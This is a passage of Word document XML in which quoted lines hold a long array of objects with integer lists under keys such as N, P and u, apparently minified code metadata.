    <w:p w14:paraId="5E38C718" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433AC07B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 12, 15, 19, 22, 67, 131, 159, 183, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF70394" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025116E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7DF4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E68D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB8BED1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D5967" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DB9976" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B23ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE0FB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6CD5EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695738F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52313618" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 7, 9, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F512CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF4BBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796988DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B4AC79" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4999AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898E454" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7C2EA0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23158E3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [25, 28, 216]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE7309" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FCE94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4C0FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C4662" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544F857" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7FA2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21453849" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 11, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D1B3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 4, 5, 6, 7, 8, 9, 10, 17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5AF861" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF79FF1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFC063" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784455BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [106, 146, 189, 354]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099B083" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531579D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF13E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA671E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 27, 29, 71, 78, 88, 97, 101, 108, 110, 134, 136, 165, 215, 232, 235, 260, 289, 298, 319, 355]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2D5B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDDC4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B90B08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8E6F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF10F8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEEB087" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6DAED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51396C32" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [7, 18, 21, 22, 23, 24, 33, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F8998D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36277277" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F1A92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B16A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFCBD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B0D03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DED7C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A089CCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 7, 8, 13, 19, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47741E18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB34C58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584ACB4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE23BFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B239D59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058034C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B835BA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795F851B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [313]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082579D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03681727" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4CE2F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5, 7, 12, 14, 18, 20, 28, 29, 30, 31, 32, 33, 34],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC3FF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 6, 8, 9, 10, 11, 13, 15, 16, 17, 19, 21, 22, 23, 24, 25, 26, 27, 125, 151, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E30C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17424AE4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653FC566" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A84B936" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C240AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27383AEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338E578" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C80ADB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 7, 9, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D553A5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 6, 8, 63, 81, 90, 144, 180, 188, 249, 282, 283, 313, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ACF493" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F8FBC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA9DB17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146D93F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 18, 20, 33]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56092233" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3771CFFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24446E4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704880EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886CEBA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B58C1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD0683" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F7821" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3047BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C9E2F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D5568" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 17,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E123293" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B094C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D105E90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 46, 234, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48086565" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0526BE8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A688EB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583819D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43FD48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58AB7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7CFD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC9D68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 21, 29, 284]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F6AC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F755C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68561EF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEDD932" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B21E3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493F0A83" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12832334" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA2CAD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 7, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C0B7D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958DE5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31575EFE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3FB81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68347DC5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9DCC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27EC47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A030CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C9CC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409797F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ADF3D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670446A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD7106" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5B6D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA430C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFC729" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB868AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 38, 96, 145, 210, 221, 233, 234, 268, 305]</w:t>
      </w:r>
    </w:p>
